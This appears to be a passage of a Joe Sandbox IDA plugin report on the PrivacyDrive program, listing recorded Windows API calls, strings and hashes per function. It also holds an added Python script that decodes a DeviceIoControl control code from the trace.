                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Image$Width$FormatString$AlignCreateDeleteDrawFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 1060473745-0
                                • Opcode ID: 85fb0716d7b6b49d8a71fc5851715fb9ea630a9b1e10a141e884ff53e867db09
                                • Instruction ID: 723f04de026b6bce35317fdf31a233da12587136ab6fdb08ad58b2235d7c645a
                                • Opcode Fuzzy Hash: 85fb0716d7b6b49d8a71fc5851715fb9ea630a9b1e10a141e884ff53e867db09
                                • Instruction Fuzzy Hash: 0D911475208705AFC714CF29C884A5ABBE5FF89314F048A1EF899973A0EB30E854DF95
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004342E2
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00434336
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,?,00577AF8), ref: 00434363
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00434388
                                • QueryPerformanceCounter.KERNEL32(?), ref: 004343D4
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 0043445D
                                • GetDC.USER32(00000000), ref: 004344D3
                                • UpdateLayeredWindow.USER32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 004344FC
                                • ReleaseDC.USER32(00000000,00000000), ref: 00434505
                                • Sleep.KERNEL32(0000000A), ref: 0043450D
                                • PostMessageW.USER32(00000000), ref: 00434545
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterGdipWindow$ClearExceptionException@8FrequencyGraphicsLayeredMessageModePostRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 2630759416-0
                                • Opcode ID: d79de5b915a1d7d8d19041ace2db1fe06813aecfff2bb6ad53b21545eee6f333
                                • Instruction ID: f5128098092fa105b9cd5fdf089ddcbc3ad0924b79c7ef4185e5b0093c6cfb9a
                                • Opcode Fuzzy Hash: d79de5b915a1d7d8d19041ace2db1fe06813aecfff2bb6ad53b21545eee6f333
                                • Instruction Fuzzy Hash: 3D912775D006189FDB11CFA8D898BDEBBB8FF59304F10426AE819B7251DB34A985CF50
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                • DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                • LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                • LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$MessagePeek$EnterLeave$ControlDevice
                                • String ID:
                                • API String ID: 1761629311-0
                                • Opcode ID: ff1c069342d43516b48a516ac4b44da53b82304d07ad053cf874c026a89a8c33
                                • Instruction ID: 1d2f3ce85e670feacd16a1eda1433550c9d54b7a95cde47fb54ccb38de6f1f15
                                • Opcode Fuzzy Hash: ff1c069342d43516b48a516ac4b44da53b82304d07ad053cf874c026a89a8c33
                                • Instruction Fuzzy Hash: 0641A771A00318BBEB10DF90CC49F9A77B8EB15711F15406AFB05AB2C0DBB8A945CB95
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                • DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                  • Part of subcall function 004FFCFE: std::exception::exception.LIBCMT ref: 004FFD34
                                  • Part of subcall function 004FFCFE: __CxxThrowException@8.LIBCMT ref: 004FFD49
                                  • Part of subcall function 004FFCFE: type_info::_Type_info_dtor.LIBCMT ref: 004FFD56
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                • LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                • LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6D0A
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6D10
                                • LeaveCriticalSection.KERNEL32(005BE2CC,0000008C), ref: 004A6D30
                                  • Part of subcall function 004A6ED0: EnterCriticalSection.KERNEL32(005BE2CC,005BE2AC,?,?,?,004A6D66,00000000,00000000,005BE2AC), ref: 004A6EE0
                                  • Part of subcall function 004A6ED0: LeaveCriticalSection.KERNEL32(005BE2AC,?,?,?,004A6D66,00000000,00000000,005BE2AC), ref: 004A6F49
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveMessagePeek$ControlDeviceException@8ThrowType_info_dtor_mallocstd::exception::exceptiontype_info::_
                                • String ID:
                                • API String ID: 1362532578-0
                                • Opcode ID: 83d394ebbdc2c39c865c6fe841e20bfeeca3ba7048219cb1643518fe4f0463e6
                                • Instruction ID: a5da356c8d1767b26f23f397bb59cde1352586ba300697f3f32f5539806e1a7f
                                • Opcode Fuzzy Hash: 83d394ebbdc2c39c865c6fe841e20bfeeca3ba7048219cb1643518fe4f0463e6
                                • Instruction Fuzzy Hash: 1341A771A40318ABEB10DF90CC49F9A7778EB15710F154069FB05AB2C0DBB86905CB55
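                                 The two entries above both record the same DeviceIoControl call at 004A6BE6, whose second argument, the control code, is 07770C34. The report does not say which driver or device the handle refers to, so the code itself is the only thing to read. The following Python is an added example (not part of the Joe Sandbox report or of the analysed Privacy Drive binary) that decodes such a control code per the CTL_CODE layout documented in winioctl.h, and rebuilds it to check the decoding round-trips. It assumes that a trace line lists arguments in the API's parameter order, so that the second argument of DeviceIoControl is dwIoControlCode; the trace line embedded in the block is copied from the entry above, and the IOCTL_STORAGE_QUERY_PROPERTY constant is used only as a known-good reference.

```python
# Added example: decode a DeviceIoControl control code pulled from a sandbox
# API trace. The bit layout is the CTL_CODE macro from winioctl.h:
#   bits 31..16  DeviceType
#   bits 15..14  RequiredAccess (FILE_ANY_ACCESS / READ / WRITE)
#   bits 13..2   Function
#   bits  1..0   Method (how the I/O manager passes the buffers)
import re
from dataclasses import dataclass

METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# A handful of documented device types from winioctl.h, enough to spot common
# storage and file-system IOCTLs. Anything else is reported as unknown.
DEVICE_TYPES = {0x02: "FILE_DEVICE_CD_ROM", 0x07: "FILE_DEVICE_DISK",
                0x09: "FILE_DEVICE_FILE_SYSTEM", 0x12: "FILE_DEVICE_NETWORK",
                0x22: "FILE_DEVICE_UNKNOWN", 0x2D: "FILE_DEVICE_MASS_STORAGE"}


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int

    @property
    def device_type_name(self) -> str:
        if self.device_type in DEVICE_TYPES:
            return DEVICE_TYPES[self.device_type]
        # Microsoft reserves 0x8000 and above for third-party drivers; a value
        # below that which is not documented is simply non-standard.
        return "vendor-defined" if self.device_type >= 0x8000 else "undocumented"

    @property
    def method_name(self) -> str:
        return METHODS[self.method]

    @property
    def access_name(self) -> str:
        return ACCESS[self.access]


def decode_ioctl(code: int) -> Ioctl:
    """Split a 32-bit control code into its CTL_CODE fields."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("control code must fit in 32 bits")
    return Ioctl(code=code,
                 device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3)


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE macro itself; inverse of decode_ioctl."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def describe(code: int) -> str:
    i = decode_ioctl(code)
    return (f"0x{code:08X}: DeviceType=0x{i.device_type:04X} ({i.device_type_name}), "
            f"Function=0x{i.function:03X}, {i.method_name}, {i.access_name}")


# Trace lines in the Joe Sandbox format "API.MODULE(arg,arg,...), ref: ADDR".
# Assumption: arguments appear in the API's parameter order, so for
# DeviceIoControl the second one is dwIoControlCode. "?" means the sandbox
# could not recover that value.
TRACE_RE = re.compile(r"DeviceIoControl\.\w+\(([^)]*)\)")


def control_codes_from_trace(lines) -> list:
    codes = []
    for line in lines:
        m = TRACE_RE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group(1).split(",")]
        if len(args) < 2 or args[1] == "?":
            continue
        codes.append(int(args[1], 16))
    return codes


# Sample input: the trace lines of the entry above, bullet characters removed.
SAMPLE_TRACE = [
    "PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC",
    "DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6",
    "EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84",
]

if __name__ == "__main__":
    for c in control_codes_from_trace(SAMPLE_TRACE):
        print(describe(c))
```

For 07770C34 the decoder yields DeviceType 0x0777, Function 0x30D, METHOD_BUFFERED and FILE_ANY_ACCESS. 0x0777 is neither a documented Microsoft device type nor in the vendor range, which is common for driver and application pairs that share a private constant. FILE_ANY_ACCESS means the code carries no access requirement of its own; whether an unprivileged caller can issue it is then decided entirely by the DACL on the device object. That is a general property of the encoding, not a finding about this driver, which the report does not examine.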
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0044D8D5,7563D392,?,00000000,?,00541480,000000FF,?,004ACB4E,?,?,FFFFFFFF), ref: 0044D790
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D7A8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?), ref: 0044D7D5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D7E7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?), ref: 0044D814
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,004ACB4E,?,?,FFFFFFFF,?,?,00000000,?,?,?,75C0B400), ref: 0044D826
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$MOUNT_VOLUME$PM_EXPAND_HEIGHT$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-1496781244
                                • Opcode ID: 246aa87afa2c323b5010a2bf15a9e526ae3d67f439db5891a926733130d192ad
                                • Instruction ID: b99075d67880d150db95fea7b3dcd8c5b43d8aaeab710f2ffcf1315b80218124
                                • Opcode Fuzzy Hash: 246aa87afa2c323b5010a2bf15a9e526ae3d67f439db5891a926733130d192ad
                                • Instruction Fuzzy Hash: 78217F71781705ABEA14B7729D46FB67BA8BB44B46F04403BB649D72C1EEE4F800CB25
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 004339E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004339F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00433A25
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00433A37
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTRATION_REMINDER_MINI), ref: 00433A64
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00433A76
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PM_HEIGHT$PM_SHADOW_WIDTH$PM_WIDTH$REGISTRATION_REMINDER_MINI
                                • API String ID: 904232820-628402293
                                • Opcode ID: 8a303dbc6a08b9b230a55dcd491f9a9239ec8858bbadb16582f74529764b6ef1
                                • Instruction ID: 01a4af7a8983b9cbc0bae47a87f88d331cf5c0f129bfaf1372eb488655e116fa
                                • Opcode Fuzzy Hash: 8a303dbc6a08b9b230a55dcd491f9a9239ec8858bbadb16582f74529764b6ef1
                                • Instruction Fuzzy Hash: 192153713807056BEA14F7769C62FAB6A98BB44B46F04002EB689D72C0EAD4FC00CB65
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: %02X$LicenseInfo$PrivacyDrive$aes$t=X$xml version="1.0" encoding="utf-8" standalone="yes"
                                • API String ID: 0-1655645018
                                • Opcode ID: a44a90f908ebdff796c13cb356e8ed58c53c1e7706bd49559dd09e8cb5c64126
                                • Instruction ID: 2b40ced9dc77dbca4e0f24fa77658248ffcf90a1b38b045d79637e8b98031ac3
                                • Opcode Fuzzy Hash: a44a90f908ebdff796c13cb356e8ed58c53c1e7706bd49559dd09e8cb5c64126
                                • Instruction Fuzzy Hash: EE128271D003599BEB21EF55CC49BDEBBB8AF04304F5041AAE409BB282D7745B88CF65
                                APIs
                                  • Part of subcall function 00477BE0: FindFirstFileW.KERNEL32(?,?,7563D392,005BE234,00000000), ref: 00477CC7
                                • FindClose.KERNEL32(00000000,7563D392,0040FFE5,005BE234,?,?,?,0054A882,000000FF,?,004B424C,?), ref: 004B3687
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004B3720
                                • CloseHandle.KERNEL32(?,00000000), ref: 004B3A2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseFileFind$FirstHandleRead
                                • String ID: LicenseInfo$PrivacyDrive$ProgramVerify.cpp$aes
                                • API String ID: 4236138798-3904884426
                                • Opcode ID: 94fa29a9087f1a3de13979d77d1479f5723d2687f2186e487e5949012d2993bc
                                • Instruction ID: 0ecdb5307493fc99b76f6c23da6f250795bab4ac0021707581e64cc097c89d38
                                • Opcode Fuzzy Hash: 94fa29a9087f1a3de13979d77d1479f5723d2687f2186e487e5949012d2993bc
                                • Instruction Fuzzy Hash: 94C1F7719012189BEB20DF65CC4AFEEBB78AF04715F1041AEE509772C1EB78AB44CB65
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: !@$%c:$0016$0022$0029$[
                                • API String ID: 0-2905711024
                                • Opcode ID: 7b0af9b6475e3d6ed52d944d25ade539a5fc2cbe0f786ecbc94d860d8d141453
                                • Instruction ID: ee1b57b2201dcb178891f03c976f8cd6469f735d9dab38513d8f865263f43e2c
                                • Opcode Fuzzy Hash: 7b0af9b6475e3d6ed52d944d25ade539a5fc2cbe0f786ecbc94d860d8d141453
                                • Instruction Fuzzy Hash: 3C71CF71A10208AFDB10DFA4DD46BEEBBB4FB08714F14462AF521A73D0D7B86944CBA5
                                APIs
                                • GetDC.USER32(00000000), ref: 00472710
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 00472730
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00472761
                                • GdipMeasureString.GDIPLUS(00000000,00000010,000000FF,00000000,00000000,00000000,00000000,00000000,?), ref: 0047285F
                                • GdipMeasureString.GDIPLUS(00000000,-00000028,000000FF,00000000,00000000,00000000,00000000,00000000,?), ref: 004728C2
                                • ReleaseDC.USER32(00000000,?), ref: 00472913
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00472922
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 00472934
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormatMeasure$FromGraphicsRelease
                                • String ID: L
                                • API String ID: 3577886877-2909332022
                                • Opcode ID: 1f1e4dc9e29e55b5343837b4a5243709e87b2aef5f2b695d40084e771580aa2d
                                • Instruction ID: bce8b58071e995fc69a8caed146b6afefa0788b2437d3f69981ee98452df7f17
                                • Opcode Fuzzy Hash: 1f1e4dc9e29e55b5343837b4a5243709e87b2aef5f2b695d40084e771580aa2d
                                • Instruction Fuzzy Hash: B67159B16083419FD314CF28C984B5BBBE5FF89304F018A1DF8959B2A0E7B5E904CB92
                                APIs
                                • GetClassNameW.USER32(?,00000000,-00000001), ref: 004015CC
                                • GetWindowTextW.USER32(?,00000000,-00000001), ref: 0040165A
                                • _wcsstr.LIBCMT ref: 0040166D
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00401680
                                • EnumChildWindows.USER32(?,Function_00001420,?), ref: 004016AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ChildClassEnumMessageNamePostTextWindowWindows_wcsstr
                                • String ID: !@$%c:\$CabinetWClass$ExploreWClass
                                • API String ID: 871461574-603653411
                                • Opcode ID: b38e0aca2129a68135e6c9f3b7786b7596dbd0a197b37821394c374c46dc5b0a
